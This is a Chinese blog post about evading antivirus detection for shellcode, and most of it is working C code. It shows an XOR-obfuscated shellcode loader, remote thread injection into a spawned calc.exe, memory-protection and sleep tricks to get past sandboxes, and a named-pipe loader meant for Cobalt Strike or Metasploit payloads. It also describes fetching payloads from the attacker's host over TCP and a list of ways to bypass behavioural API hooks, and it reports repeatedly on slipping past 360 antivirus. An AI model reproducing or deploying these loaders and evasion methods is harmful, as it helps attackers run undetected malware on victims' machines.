免杀简述2(二次编译shellcode\远程加载shellcode\shellcode远程线程注入\内存申请优化\管道技术)

最新推荐文章于 2024-02-17 11:00:30 发布
最新推荐文章于 2024-02-17 11:00:30 发布
阅读量10w+ 收藏 26
点赞数 6
分类专栏: 免杀相关 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/107888800
版权

二次编译

也可以理解成shellcode混淆,将shellcode执行前进行各种加密,然后执行的时候进行解密。Xor就是一个例子。原理是先将加密后的shellcode写入程序中,然后再在程序里面写入shellcode解密程序,这样子将shellcode混淆后,特征码等各种数值就会改变,可以绕过大部分的静态查杀,加密方法不限制,自己写也是可以的。Exp:xor加密shellcode代码:

源代码:https://github.com/shanfenglan/xor_shellcode

#include stdio.h
#define KEY 0x97     //进行异或的字符unsigned char buf[] = "shellcode";
int main(int argc, char* argv[]){  
unsigned char c[sizeof(buf)];   //获取shellcode长度  
for (int i = 0; i < sizeof(buf)-1; i++)  {    
        c[i] = buf[i] ^ KEY;//进行解密
        printf("\\x%x",c[i]);
  }    
  printf("\n");
   return 0;
}
shellcode加载代码:
#include "windows.h"
#include "stdio.h"
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//运行时不显示窗口
#define KEY 0x97
char bufff[] = "shellcode";
void main(){ 
	unsigned char buff[sizeof(bufff)];   //获取shellcode长度
	for (int i = 0; i < sizeof(bufff) - 1; i++)
	{
		buff[i] = bufff[i] ^ KEY;//进行解密
	} 
	LPVOID Memory = VirtualAlloc(NULL, sizeof(buff), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(Memory, buff, sizeof(buff));
	((void(*)())Memory)();
}

远程加载shellcode(通过tcp请求下载并加载到内存)

在这里插入图片描述
在这里插入图片描述
360无毒,因为是tcp的链接,所以可以检测到。
在这里插入图片描述

服务端也就是shellcode的存储端会报毒, 不过没关系,因为服务端在我们攻击者的主机上。

参考代码:实现:远程加载shellcode实现分离免杀

shellcode远程线程注入

#include Windows.h
#include stdio.h
#include "iostream"
//隐藏运行程序时的cmd窗口
#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )
using namespace std; 
//使用CS或msf生成的C语言格式的上线shellcode
unsigned char shellcode[] = ""; 
BOOL injection(){    
wchar_t Cappname[MAX_PATH] = { 0 };    STARTUPINFO si;    PROCESS_INFORMATION pi;    
LPVOID lpMalwareBaseAddr;   
LPVOID lpnewVictimBaseAddr;    
HANDLE hThread;    
DWORD dwExitCode;    
BOOL bRet = FALSE;     
//把基地址设置为自己shellcode数组的起始地址    
lpMalwareBaseAddr = shellcode;     
//获取系统路径,拼接字符串找到calc.exe的路径    
GetSystemDirectory(Cappname, MAX_PATH);    lstrcat(Cappname, L"\\calc.exe");     
//打印注入提示   
// printf("被注入的程序名:%S\r\n", Cappname);     
ZeroMemory(&amp;si, sizeof(si));    
si.cb = sizeof(si);    
ZeroMemory(&amp;pi, sizeof(pi));     
//创建calc.exe进程   
if (CreateProcess(Cappname, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED 
, NULL, NULL, &amp;si, &amp;pi) == 0)    {       
return bRet;   
} 
lpnewVictimBaseAddr=VirtualAllocEx(pi.hProcess , NULL, sizeof(shellcode) + 1, MEM_COMMIT | MEM_RESERVE,        PAGE_EXECUTE_READWRITE);    
if (lpnewVictimBaseAddr == NULL)    {
return bRet;   
}    
//远程线程注入过程    
WriteProcessMemory(pi.hProcess,lpnewVictimBaseAddr,(LPVOID)lpMalwareBaseAddr, sizeof(shellcode) + 1, NULL);    
hThread = CreateRemoteThread(pi.hProcess, 0,0, (LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr, NULL, 0, NULL);
WaitForSingleObject(pi.hThread, INFINITE);
GetExitCodeProcess(pi.hProcess,&amp;dwExitCode);    
TerminateProcess(pi.hProcess, 0);    
return bRet;
} 
void help(char* proc){    
// printf("%s:创建进程并将shellcode写入进程内存\r\n", proc);
} 
int main(int argc, char* argv[]){    help(argv[0]);    
injection();
}

在这里插入图片描述

虽然还是有不少的查杀,但是可以过360

用到的系统api:

1.LoadLibrary() 和 GetProcAddress()
这两个函数,一个是加载dll库,一个是从已经加载的库句柄里拿出来某个函数的地址,可以理解成是把一个dll加到内存里,然后获取里面某个函数的地址,得到这个地址后就可以直接调用了,这两个简单的函数经常用到,无论是常规调用还是静态免杀都经常用。

2.OpenProcess()
根据进程id获取进程的句柄,也就是获取进程操控权。

3.VirtualAllocEx()
在指定进程里开辟一块内存,用于存放自己的代码和参数。

4.WriteProcessMemory()
3里面的函数会在一个进程里开辟一块内存,然后在那个内存里直接用本函数4进行数据写入,就是在别人那开一块内存然后写自己的东西。

5.CreateRemoteThread()
最核心的函数,在指定进程的某个内存位置存储的函数为线程函数,启动一个线程,当然被启动的这个线程属于指定的这个进程。

远程线程注入原理

线程注入原理大概就是说我们通过一定的手段在宿主也就是需要被注入的进程那获取权限,得到权限之后我们要在这个进程上开辟一定的内存,然后把自己的线程函数内容以及参数什么的全都拷贝过去,这样目标进程上有我们的函数,我们的参数。
我们这个时候只需要"帮"它启动一下这个线程就OK了,直接用CreateRemoteThread函数在对方进程的某个内存位置的某个线程函数作为线程函数启动。

参考:远控免杀第八篇shellcode免杀

资源修改

修改图标等资源,效果比较差,利用的是Resource hacker工具,不推荐。

加壳

软件加壳其实也就是软件加密或者软件压缩,只是加密或者压缩的方式不一样。加壳几乎可以绕过所有的特征码检测,但是壳也有自己的特征码,所以需要自己去写。通过加壳绕过杀软原理还是绕过特征码检测,需要很强的代码与逆向能力,这里不做过多描述。

内存申请优化的方法

在这里插入图片描述
虽然很多检测到了但是,,还是可以过360。

vt上显示过360,但是刚360又查杀了,搞不懂。。

#include <Windows.h>

// 入口函数
int wmain(int argc, TCHAR* argv[]) {

    int shellcode_size = 0; // shellcode长度
    DWORD dwThreadId; // 线程ID
    HANDLE hThread; // 线程句柄
    DWORD dwOldProtect; // 内存页属性
/* length: 800 bytes */

    unsigned char buf[] = "";

    // 获取shellcode大小
    shellcode_size = sizeof(buf);

    /* 增加异或代码 */
    for (int i = 0; i < shellcode_size; i++) {
        buf[i] ^= 10;
    }
    /*
    VirtualAlloc(
        NULL, // 基址
        800,  // 大小
        MEM_COMMIT, // 内存页状态
        PAGE_EXECUTE_READWRITE // 可读可写可执行
        );
    */

    char* shellcode = (char*)VirtualAlloc(
        NULL,
        shellcode_size,
        MEM_COMMIT,
        PAGE_READWRITE // 只申请可读可写
    );

    // 将shellcode复制到可读可写的内存页中
    CopyMemory(shellcode, buf, shellcode_size);

    // 这里开始更改它的属性为可执行
    VirtualProtect(shellcode, shellcode_size, PAGE_EXECUTE, &dwOldProtect);

    // 等待几秒,兴许可以跳过某些沙盒呢?
    Sleep(2000);

    hThread = CreateThread(
        NULL, // 安全描述符
        NULL, // 栈的大小
        (LPTHREAD_START_ROUTINE)shellcode, // 函数
        NULL, // 参数
        NULL, // 线程标志
        &dwThreadId // 线程ID
    );

    WaitForSingleObject(hThread, INFINITE); // 一直等待线程执行结束
    return 0;
}

此项技术的核心在于,先申请了正常的可读写内存,停滞几秒后,改变内存状态为可执行。

利用管道技术免杀可过360

#include <Windows.h>
#include <stdio.h>
#include <intrin.h>

#define BUFF_SIZE 1024
unsigned char buf[] = "";
LPCTSTR ptsPipeName = TEXT("\\\\.\\pipe\\BadCodeTest");

BOOL RecvShellcode(VOID) {
    HANDLE hPipeClient;
    DWORD dwWritten;
    DWORD dwShellcodeSize = sizeof(buf);
    // 等待管道可用
    WaitNamedPipe(ptsPipeName, NMPWAIT_WAIT_FOREVER);
    // 连接管道
    hPipeClient = CreateFile(ptsPipeName, GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hPipeClient == INVALID_HANDLE_VALUE) {
        printf("[+]Can't Open Pipe , Error : %d \n", GetLastError());
        return FALSE;
    }

    WriteFile(hPipeClient, buf, dwShellcodeSize, &dwWritten, NULL);
    if (dwWritten == dwShellcodeSize) {
        CloseHandle(hPipeClient);
        printf("[+]Send Success ! Shellcode : %d Bytes\n", dwShellcodeSize);
        return TRUE;
    }
    CloseHandle(hPipeClient);
    return FALSE;
}


int wmain(int argc, TCHAR* argv[]) {

    HANDLE hPipe;
    DWORD dwError;
    CHAR szBuffer[BUFF_SIZE];
    DWORD dwLen;
    PCHAR pszShellcode = NULL;
    DWORD dwOldProtect; // 内存页属性
    HANDLE hThread;
    DWORD dwThreadId;
    // 参考:https://docs.microsoft.com/zh-cn/windows/win32/api/winbase/nf-winbase-createnamedpipea
    hPipe = CreateNamedPipe(
        ptsPipeName,
        PIPE_ACCESS_INBOUND,
        PIPE_TYPE_BYTE | PIPE_WAIT,
        PIPE_UNLIMITED_INSTANCES,
        BUFF_SIZE,
        BUFF_SIZE,
        0,
        NULL);

    if (hPipe == INVALID_HANDLE_VALUE) {
        dwError = GetLastError();
        printf("[-]Create Pipe Error : %d \n", dwError);
        return dwError;
    }

    CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)RecvShellcode, NULL, NULL, NULL);

    if (ConnectNamedPipe(hPipe, NULL) > 0) {
        printf("[+]Client Connected...\n");
        ReadFile(hPipe, szBuffer, BUFF_SIZE, &dwLen, NULL);
        printf("[+]Get DATA Length : %d \n", dwLen);
        // 申请内存页
        pszShellcode = (PCHAR)VirtualAlloc(NULL, dwLen, MEM_COMMIT, PAGE_READWRITE);
        // 拷贝内存
        CopyMemory(pszShellcode, szBuffer, dwLen);

        /*for (DWORD i = 0; i < dwLen; i++) {
            Sleep(50);
            _InterlockedXor8(pszShellcode + i, 10);
        }*/

        // 这里开始更改它的属性为可执行
        VirtualProtect(pszShellcode, dwLen, PAGE_EXECUTE, &dwOldProtect);
        // 执行Shellcode
        hThread = CreateThread(
            NULL, // 安全描述符
            NULL, // 栈的大小
            (LPTHREAD_START_ROUTINE)pszShellcode, // 函数
            NULL, // 参数
            NULL, // 线程标志
            &dwThreadId // 线程ID
        );

        WaitForSingleObject(hThread, INFINITE);
    }

    return 0;
}

原理:创建一个子线程当命名管道当另一端也就是客户端,用来传输shellcode,进程自己当服务端用来接收shellcode分配内存并运行。

行为免杀(摘抄)

杀毒软件现在都会有主防的功能,对恶意行为进行拦截提示。比如这些行为:注册表操作,添加启动项,添加服务文件写入、读系统文件、删除文件,移动文件杀进程,创建进程注入、劫持等行为拦截原理说白了,恶意行为都是通过API调用来完成的,可能是一个API,可能是多个APi组合。杀软通过技术手段拦截这些API调用,通过策略来判断是否属于恶意行为。

关键点:
API
策略(顺序,调用源,参数等等)
所以后面的方法就是针对这两点做的工作。

如何进行行为免杀呢?

  1. 替换api
    使用相同功能的API进行替换,杀软不可能拦截了所有API,所以这种方式还是有效的。比如MoveFileEx替换MoveFile。
  2. 未导出api
    寻找相同功能的未导出API进行替换,杀软拦截一般是导出API,或者底层调用,寻找未导出API有一定效果。
    寻找方法,通过分析目标API内部调用,找到内部一个或多个未导出API,来完成相同功能。
  3. 重写api
    完全重写系统API功能(通过逆向),实现自己的对应功能API,对于ring3的行为拦截非常有效。比如实现MoveFile等。
  4. api+5
    ring3的API拦截通过是挂钩API头几个字节内容,然后进入杀软自己函数进行参数检查之类的。
  5. 底层api
    该方法类似于2和3,杀软拦截API可能更加高层(语义更清楚),那就可以找更底层API进行调用,绕过拦截,比如使用NT函数。
    或者通过DeviceIoControl调用驱动功能来完成API功能。
    模拟系统调用。
  6. 合理替换调用顺序
    有时拦截行为是通过多个API组合来完成的,所以合理替换顺序,绕过杀软拦截策略,也可以绕过改行为拦截。
    比如,先创建服务,再将服务对应文件拷贝过去。
  7. 绕过调用源
    通过调用其它进行功能来完成API的功能。比较经典的如,通过rundll32.exe来完成dll加载,通过COM来操作文件等等。

参考资料:
那些shellcode免杀总结
远控免杀第八篇shellcode免杀
远控免杀从入门到实践 (11) 终结篇

在这里插入图片描述
需要工具的可以直接搜索下载,我已经上传,不需要积分。

Shanfenglan7
关注
  • 6
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Python远程加载分离、反序列化免杀
qq_43606723的博客
08-15 1680
shellcode.py远程加载反序列化免杀手法
C调用shellcode方法总结
司徒荆的博客
09-02 3161
1、shellcode 定义: shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 2、可以将dll转成shellcode的c源码(https://blog.csdn...
远程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
程序界面,可自定义任意shellcode 注入任意进程 此程序自带将msf的远控shellcode转换成 易语言 可调用的shellcode 同时还可以将注入的功能生成出自己的程序可调用的代码 双击第三个输入框即可生成shellcode,这里默认的shellcode远程线程注入 注入的是当前程序选择注入的进程 这里选择最左下角的选项,然后再双击输入框 即可生成在自身程序执行的shellcode 这里说明一下哈,这里是可以自定义shellcode进行注入的,并不是必须使用msf生成的shellcode进行注入 这里将自己扣出来的shellcode放在第一个输入框就行了,十进制的机器码之间以半角符逗号分隔开 生成的shellcode给自己的代码调用 记得要配合上 精易模块 进行使用 当然了 也可以自己手动补dll进去 以下为关键代码的截图 使用易语言好几年了,从最初的进厂打工(满心的无奈) 到现在的安全工程师,易语言是带我入门的语言 也是我至今最喜欢的语言之一 易语言对于我来说更多的是一种说不上来的感觉 对于我来说易语言是有生命的 也是易语言赐予了我入门这行的基础(很扎实很扎实) 此工具是前两天匆忙写出来的,如果有哪里做的不够好以及觉得此程序很烂的大佬们不要喷我 以下为下载地址 此程序使用了精易模块以及未闻花名的 皮肤模块
基于Java实现的Shellcode加载器源码+项目说明.zip
12-29
1.项目代码均经过功能验证ok,确保稳定可靠运行。欢迎下载体验!下载完使用问题请私信沟通。 2.主要针对各个计算机相关专业,包括计算机科学、信息安全、数据科学与大数据技术、人工智能、通信、物联网等领域的在校学生、专业教师、企业员工。 3.项目具有丰富的拓展空间,不仅可作为入门进阶,也可直接作为毕设、课程设计、大作业、初期项目立项演示等用途。 4.当然也鼓励大家基于此进行二次开发。在使用过程中,如有问题或建议,请及时沟通。 5.期待你能在项目中找到乐趣和灵感,也欢迎你的分享和反馈! 【资源说明】 基于Java实现的Shellcode加载器源码+项目说明.zip 编译 maven package 使用 默认会随机注入32位进程,请使用32位的shellcode ``` java -jar ShellcodeLoader.jar shellcode_hex ``` 注入x64位shellcode ``` java -jar ShellcodeLoader.jar --x64 shellcode_hex ``` 基于Java实现的Shellcode加载器源码+项目说明.zip基于Java实现的Shellcode加载器源码+项目说明.zip基于Java实现的Shellcode加载器源码+项目说明.zip基于Java实现的Shellcode加载器源码+项目说明.zip
Shellcode免杀对抗(C/C++)
最新发布
qq_74806534的博客
02-17 2万+
这里便是杀毒软件杀毒的原理,这就是特征,我们只需要将木马程序进行简单的分析,就能得到shell回连的IP地址和端口,如果杀毒软件发现我们的可执行文件是一个木马程序。加载器的作用:由于shellcode是一段可以执行的二进制代码,因此需要开辟出一段可以读写可操作的地址来运行shellcode,而这就是加载器的作用。之后打开.c文件是一个未编译代码,放到上文的编译代码中,注意这里是x64编译,用的方式三,使用.c文件。因为我们的加载器的特征,各平台杀毒软件都有了已经,所有我们就要用新的,特征没有被锁定。
DripLoader:用于绕过基于事件的注入检测 (PoC) 的 Evasive shellcode 加载程序
07-24
(这里的清理版本: : ) DripLoader (PoC) 用于绕过基于事件的注入检测的 Evasive shellcode 加载器,而不必抑制事件收集。 该项目旨在突出事件驱动注入识别的局限性,并表明 EDR 中需要更高级的内存扫描和更智能的本地代理软件清单。 DripLoader 通过以下方式避开常见的 EDR: 使用风险最高的 API,如NtAllocateVirtualMemory和NtCreateThreadEx 与调用参数混合以创建供应商因数量而被迫丢弃或记录并忽略的事件 通过引入延迟避免多事件相关性 DripLoader 有什么作用 标识适合我们的有效负载的基地址 在基地址保留足够的AllocationGranularity (64kB) 大小的NO_ACCESS内存段 循环那些 分配PageSize (4kB) 大小的可写段 编写shellcode 重新保护为
30.远控免杀专题(30)-Python加载shellcode免杀-8种方式(VT免杀率10-69)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
免杀入门---shellcode免杀
LvHLong的博客
05-03 5262
前言 本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 基础概念 免杀 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。 杀毒软件工作原理 市面上的杀毒软件基本由扫描器、病毒特征库和虚拟机组成,它会把文件放在虚拟机内运行,扫描该文件的特征,包括静态特征、内存特征、行为特征等,通过和病毒特征库对比来判断一个文件是否为恶意文件。安全厂商一直在收集市面上出现的...
shellCode免杀技巧
qq_39330735的博客
05-15 2017
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
ShellCode免杀的一些方法
qq_68890680的博客
06-26 511
申请内存空间:VirtualAlloc(在调用进程的虚拟地址空间中保留、提交或更改页面区域的状态分配的内存初始化为零)、VirtualAlloc2(进程注入:在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。该函数将其分配的内存初始化为零)、VirtualAllocEx(进程注入:在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。常见的加密解密方式:AES加密、hex加密、XOR+base64加密、Base85+XOR+RC4。加载方式:基础加载,纤程加载远程加载
C/C++ 远程ShellCode执行工具
CSDN
07-21 5303
通过开发一组远程代码执行盒,可以动态实现对ShellCode代码的动态载入,由于ShellCode不存放在本地客户端常量区,所以在一定程度上可以减少被杀概率,客户端只保留之基本的Socket通信功能,当需要时才会加载恶意代码运行。此工具分为服务端与客户端,客户端可以将其加入到开机自启动列表,并传入响应的参数即可,目前支持TCP/UDP/HTTP三种协议传输,后期可能会增加ICMP等来实现后门的传输工作。
Win32下ShellCode远程加载
CSDN
05-28 4873
如下Python代码是一个基本的键盘记录器,它使用了一些Windows API函数和第三方库来监视键盘活动,并记录按键、窗口切换和剪贴板操作。然后,它检测按键是否为常规按键,如果是,则输出按键字符。如果按下的是Ctrl+V,它会尝试获取剪贴板的内容并输出。函数是一个回调函数,用于处理键盘事件。它首先检测是否切换了窗口,如果切换了窗口,就调用。最后,它输出进程相关的信息。接下来,代码定义了一些全局变量和函数,包括。函数用于获取当前前台窗口的进程信息,以及。首先,代码导入了一些必要的库,包括。
利用图片隐写术来远程动态加载shellcode1
08-03
1. 最开头的两个十六进制为 42H,4DH 转为 ASCII 后分别表示 BM,所有的 BMP 文件都以这 2. 红色箭头是图片的大小(这里对应的十六进制为
用C和Go语言加载shellcode
眼科住院医一枚,偶尔搞搞赛博朋克
02-26 961
用C和Go语言加载shellcode
总结加载Shellcode的各种方式(更新中!)
xf555er的博客
05-24 1968
异步过程调用(APC)队列是一个与线程关联的队列,用于存储要在该线程上下文中异步执行的函数。操作系统内核会跟踪每个线程的 APC 队列,并在适当的时机触发队列中挂起的函数。APC 队列通常用于实现线程间的异步通信、定时器回调以及异步 I/O 操作。内核模式 APC:由内核代码发起,通常用于处理内核级别的异步操作,如异步 I/O 完成。用户模式 APC:由用户代码发起,允许用户态应用程序将特定函数插入到线程的 APC 队列中,以便在线程上下文中异步执行。
笔记:ShellCode 远程线程注入
喜欢唱,rap,篮球的程序员
09-19 336
什么是进程,什么是线程进程就是4GB的空间,线程就是EIP。
免杀专题 (三)对loader进行远程加载
weixin_47224111的博客
12-30 1096
免杀专题 (三)对loader进行远程加载 上一篇写到的loader被各种杀软乱杀 import ctypes #shellcode加载 def shellCodeLoad(shellcode): ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
Shellcode分离加载实现免杀的两种方式(VT免杀率:1/68)
xf555er的博客
05-24 2510
本文详细介绍了如何通过文件加载远程URL加载方式实现Shellcode分离加载,以规避安全软件的检测。文章首先描述了通过Metasploit Framework生成的shellcode文件加载的过程,并提供了相关的C++代码。为了避免被杀毒软件检测,利用动态API调用和lazy_importer项目进行代码优化。其次,文章讨论了如何通过远程URL加载shellcode,也提供了相应的实现代码。
动态加载 ShellCode绕过杀软
CSDN
08-11 5040
反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下载并将代码加载内存中,会发生什么?事实证明这样做可以绕过大多数杀软的查杀。虽然这种绕过方法并不是新鲜技术,但绕过反病毒软件对于大多数后门来说都是必要的,在这篇文章中,我们将使用virscan作为我们的检测工具,并使用Metasploit生成一些反向的ShellCode作为我们的攻击载荷。
shellcode 免杀
05-29
Shellcode 免杀技术是指通过对 Shellcode 代码进行加密、混淆、变形等手段,使其在被杀毒软件或安全设备检测时无法被识别,从而达到免杀的目的。 以下是一些常见的 Shellcode 免杀技术: 1. 加密:将 Shellcode 代码进行加密,使其在内存中存储时无法被检测到。 2. 随机变形:通过修改 Shellcode 代码中的一些关键字、函数名等来使其难以被检测到。 3. 延时加载:将 Shellcode 代码分为多个部分,只有在特定条件下才会加载,从而避免被杀毒软件或安全设备检测到。 4. 模块化:将 Shellcode 代码拆分为多个模块,每个模块都可以独立执行,从而难以被检测到。 5. 零宽度字符:利用 Unicode 中的零宽度字符来隐藏 Shellcode 代码,使其在被杀毒软件或安全设备检测时无法被识别。 需要注意的是,Shellcode 免杀技术只是提高了 Shellcode免杀能力,但并不能完全避免被检测到。因此,在实际应用中,还需要结合其他防御措施来确保系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值